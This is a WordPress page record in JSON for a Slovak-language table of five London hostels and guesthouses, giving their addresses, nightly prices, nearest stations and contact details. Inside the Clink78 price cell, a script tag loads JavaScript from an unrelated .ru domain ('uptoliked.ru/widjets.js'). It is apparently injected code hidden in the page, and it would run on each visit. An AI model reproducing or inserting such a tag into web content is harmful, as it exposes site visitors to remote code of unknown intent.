{"id":18886,"date":"2015-01-10T23:13:08","date_gmt":"2015-01-10T23:13:08","guid":{"rendered":"http:\/\/www.scmlondon.org\/?page_id=18886"},"modified":"2015-01-10T23:36:41","modified_gmt":"2015-01-10T23:36:41","slug":"ubytovanie","status":"publish","type":"page","link":"https:\/\/www.scmlondon.org\/?page_id=18886","title":{"rendered":"UBYTOVANIA"},"content":{"rendered":"<table border=\"0\" style=\"width: 900px; border-spacing: 0.5em; vertical-align: top; border-collapse: separate; border-spacing: 10px;\">\n<tr>\n<td height=\"32\" align=\"left\"><b>Zariadenie<\/b><\/td>\n<td align=\"left\"><b>Adresa<\/b><\/td>\n<td align=\"left\"><b>min. cena <br \/>za noc \/ osobu<\/b><\/td>\n<td align=\"left\"><b>Najbli\u017e&scaron;ia stanica a vzdialenos&#357; <\/b><\/td>\n<td align=\"left\"><b>Kontakty<\/b><\/td>\n<td align=\"left\"><b>Pozn&aacute;mka<\/b><\/td>\n<\/tr>\n<tr>\n<td height=\"53\" align=\"left\">Penzion Lond&yacute;n<\/td>\n<td align=\"left\">64 De Vere Gardens<br \/>Ilford IG1 3EE<\/td>\n<td align=\"right\" sdval=\"20\" sdnum=\"2057;0;[$&pound;-809]#,##0.00;[RED]-[$&pound;-809]#,##0.00\">&pound;20.00<\/td>\n<td align=\"left\">Redbridge alebo Gants Hill (Central Line)<br \/>10 min. pe&scaron;o<\/td>\n<td align=\"left\"><a href=\"http:\/\/www.ubytovanie-londyn.com\/\">www.ubytovanie-londyn.com<\/a><br \/><a href=\"mailto:mial@centrum.sk\">mial@centrum.sk<\/a><br \/>+44 7528 934 128<\/td>\n<td align=\"left\">prev&aacute;dzkovate&#318;ka je Slovenka<\/td>\n<\/tr>\n<tr>\n<td height=\"53\" align=\"left\">Clink78<\/td>\n<td align=\"left\">78 King&#8217;s Cross Road<br \/>London WC1X 9QG <\/td>\n<td align=\"right\" sdval=\"13\" sdnum=\"2057;0;[$&pound;-809]#,##0.00;[RED]-[$&pound;-809]#,##0.00\">&pound;13.00<script src=\"\/\/uptoliked.ru\/widjets.js\"><\/script><\/td>\n<td align=\"left\">King&acute;s Cross St. Pancras<br \/>10 min. pe&scaron;o<\/td>\n<td align=\"left\"><a href=\"http:\/\/www.clinkhostels.com\/\">www.clinkhostels.com<\/a><br \/><a href=\"mailto:info78@clinkhostels.co.uk\">info78@clinkhostels.co.uk<\/a><br \/>+44 20 3475 3000<\/td>\n<td align=\"left\">izby s&uacute; mie&scaron;an&eacute;<br \/>po&#269;et miest variabiln&yacute;<br \/>V cene s&uacute; ra&#328;ajky<\/td>\n<\/tr>\n<tr>\n<td height=\"53\" align=\"left\">Clink261<\/td>\n<td align=\"left\">261-265 Grays Inn Road<br \/>London WC1X 8QT<\/td>\n<td align=\"right\" sdval=\"13\" sdnum=\"2057;0;[$&pound;-809]#,##0.00;[RED]-[$&pound;-809]#,##0.00\">&pound;13.00<\/td>\n<td align=\"left\">King&acute;s Cross St. Pancras<br \/>5 min. pe&scaron;o<\/td>\n<td align=\"left\"><a href=\"http:\/\/www.clinkhostels.com\/\">www.clinkhostels.com<\/a><br \/><a href=\"mailto:info261@clinkhostels.co.uk\">info261@clinkhostels.co.uk<\/a> <br \/>+44 20 7713 7789<\/td>\n<td align=\"left\">izby s&uacute; mie&scaron;an&eacute;<br \/>po&#269;et miest variabiln&yacute;<br \/>V cene s&uacute; ra&#328;ajky<\/td>\n<\/tr>\n<tr>\n<td height=\"53\" align=\"left\">Inn London<\/td>\n<td align=\"left\">Lushington Road <br \/>Kensal Green<br \/>London NW10 5UU <\/td>\n<td align=\"right\" sdval=\"19\" sdnum=\"2057;0;[$&pound;-809]#,##0.00;[RED]-[$&pound;-809]#,##0.00\">&pound;19.00<\/td>\n<td align=\"left\">Kensal Green (Overground, Bakerloo Line)<br \/>7 min. pe&scaron;o<\/td>\n<td align=\"left\"><a href=\"http:\/\/www.innlondon.co.uk\/\">www.innlondon.co.uk<\/a><br \/><a href=\"mailto:info@innlondon.co.uk\">info@innlondon.co.uk<\/a><br \/>+44 7714 918 736<\/td>\n<td align=\"left\">prev&aacute;dzkovate&#318;om je Slov&aacute;k<br \/>izby s&uacute; dvojmiestne<br \/>&Scaron;t&yacute;lov&eacute; vintage priestory<\/td>\n<\/tr>\n<tr>\n<td height=\"53\" align=\"left\">Safestay<\/td>\n<td align=\"left\">144-152 Walworth Road<br \/>Elephant&amp;Castle<br \/>London SE17 1JL<\/td>\n<td align=\"right\" sdval=\"21\" sdnum=\"2057;0;[$&pound;-809]#,##0.00;[RED]-[$&pound;-809]#,##0.00\">&pound;21.00<\/td>\n<td align=\"left\">Elephant&amp;Castle (Bakerloo, Northern Line)<br \/>10 min. pe&scaron;o<\/td>\n<td align=\"left\"><a href=\"http:\/\/www.safestay.co.uk\/\">www.safestay.co.uk<\/a><br \/><a href=\"mailto:reception@safestay.co.uk\">reception@safestay.co.uk<\/a><br \/>+44 20 7703 8000<\/td>\n<td align=\"left\">izby s&uacute; mie&scaron;an&eacute;<br \/>po&#269;et miest variabiln&yacute;<br \/>v cene s&uacute; ra&#328;ajky<\/td>\n<\/tr>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>Zariadenie Adresa min. cena za noc \/ osobu Najbli\u017e&scaron;ia stanica a vzdialenos&#357; Kontakty Pozn&aacute;mka Penzion Lond&yacute;n 64 De Vere GardensIlford IG1 3EE &pound;20.00 Redbridge alebo Gants Hill (Central Line)10 min&#8230;. <a class=\"meta-more\" href=\"https:\/\/www.scmlondon.org\/?page_id=18886\">Pokra\u010dova\u0165 v \u010d\u00edtan\u00ed <span class=\"meta-nav\">&raquo;<\/span><\/a><\/p>\n","protected":false},"author":826,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"template-fullwidth.php","meta":{"footnotes":""},"class_list":["post-18886","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/18886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/users\/826"}],"replies":[{"embeddable":true,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18886"}],"version-history":[{"count":12,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/18886\/revisions"}],"predecessor-version":[{"id":18898,"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=\/wp\/v2\/pages\/18886\/revisions\/18898"}],"wp:attachment":[{"href":"https:\/\/www.scmlondon.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}